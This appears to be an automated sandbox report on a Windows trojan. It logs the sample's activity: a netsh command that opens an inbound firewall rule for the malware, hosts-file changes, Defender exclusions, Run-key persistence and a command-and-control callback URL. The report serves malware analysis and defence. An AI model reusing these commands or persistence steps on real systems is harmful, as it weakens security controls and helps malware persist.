Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settingsShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes
Modifies the hosts fileShow sources
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
Modifies the windows firewallShow sources
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Registry Run Keys / Startup Folder21Process Injection12Masquerading31OS Credential DumpingSecurity Software Discovery21Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter12Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder21File and Directory Permissions Modification1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools3Security Account ManagerVirtualization/Sandbox Evasion41SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Modify Registry1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion41LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection12Cached Domain CredentialsSystem Information Discovery122VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)File Deletion1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 553368 Sample: 5641e24e22ccd259f18585ed2cb... Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 92 Antivirus detection for URL or domain 2->92 94 Multi AV Scanner detection for submitted file 2->94 96 Sigma detected: CobaltStrike Process Patterns 2->96 98 5 other signatures 2->98 10 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe 7 1 2->10         started        15 acrotray.exe 2->15         started        17 acrotray.exe 2->17         started        process3 dnsIp4 90 185.112.83.96, 20000, 49750, 49751 SUPERSERVERSDATACENTERRU Russian Federation 10->90 88 C:\Windows\System32\drivers\etc\hosts, ASCII 10->88 dropped 114 Creates multiple autostart registry keys 10->114 116 Creates an autostart registry key pointing to binary in C:\Windows 10->116 118 Modifies the hosts file 10->118 120 Modifies the windows firewall 10->120 19 cmd.exe 1 10->19         started        22 cmd.exe 1 10->22         started        24 cmd.exe 1 10->24         started        26 10 other processes 10->26 122 Uses cmd line tools excessively to alter registry or file data 15->122 124 Adds a directory exclusion to Windows Defender 15->124 126 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->126 128 Uses whoami command line tool to query computer and username 15->128 file5 signatures6 process7 signatures8 100 Uses whoami command line tool to query computer and username 19->100 28 whoami.exe 1 19->28         started        30 conhost.exe 19->30         started        32 conhost.exe 22->32         started        34 WMIC.exe 1 22->34         started        102 Uses cmd line tools excessively to alter registry or file data 24->102 104 Uses netsh to modify the Windows network and firewall settings 24->104 106 Uses ipconfig to lookup or modify the Windows network settings 24->106 36 conhost.exe 24->36         started        39 powershell.exe 23 24->39         started        108 Adds a directory exclusion to Windows Defender 26->108 41 ipconfig.exe 1 26->41         started        43 whoami.exe 1 26->43         started        45 14 other processes 26->45 process9 signatures10 47 cmd.exe 28->47         started        56 13 other processes 28->56 50 cmd.exe 32->50         started        52 cmd.exe 32->52         started        54 cmd.exe 32->54         started        58 11 other processes 32->58 110 Adds a directory exclusion to Windows Defender 36->110 60 2 other processes 36->60 112 Uses whoami command line tool to query computer and username 41->112 62 2 other processes 41->62 64 4 other processes 45->64 process11 signatures12 130 Uses cmd line tools excessively to alter registry or file data 47->130 66 reg.exe 47->66         started        68 conhost.exe 47->68         started        70 conhost.exe 50->70         started        72 reg.exe 50->72         started        132 Uses whoami command line tool to query computer and username 52->132 76 2 other processes 52->76 78 2 other processes 54->78 80 19 other processes 56->80 134 Adds a directory exclusion to Windows Defender 58->134 74 conhost.exe 58->74         started        82 14 other processes 58->82 process13 process14 84 conhost.exe 66->84         started        86 WMIC.exe 66->86         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe21%VirustotalBrowse
5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe40%ReversingLabsWin64.Trojan.Fsysna

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://185.112.83.96:20000/callback2%VirustotalBrowse
http://185.112.83.96:20000/callback100%Avira URL Cloudmalware
http://185.112.83.96:20000/callbackmheap.freeSpanLocked100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.112.83.96:20000/callbacktrue
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://185.112.83.96:20000/callbackmheap.freeSpanLockedacrotray.exe, acrotray.exe, 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmptrue
  • Avira URL Cloud: malware
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
185.112.83.96
unknownRussian Federation
50113SUPERSERVERSDATACENTERRUfalse

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553368
Start date:14.01.2022
Start time:19:10:32
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 7s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:130
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.adwa.evad.winEXE@232/30@0/1
EGA Information:Failed
HDC Information:
  • Successful, ratio: 95.7% (good quality ratio 91.5%)
  • Quality average: 63.4%
  • Quality standard deviation: 36.6%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 23.211.6.115
  • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net
  • Execution Graph export aborted for target 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, PID 4356 because there are no executed function
  • Execution Graph export aborted for target acrotray.exe, PID 5268 because there are no executed function
  • Execution Graph export aborted for target acrotray.exe, PID 7120 because there are no executed function
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

TimeTypeDescription
19:11:34API Interceptor225x Sleep call for process: powershell.exe modified
19:11:37API Interceptor9x Sleep call for process: WMIC.exe modified
19:11:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run acrotray C:\Windows\acrotray.exe
19:11:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run acrotray C:\Windows\acrotray.exe
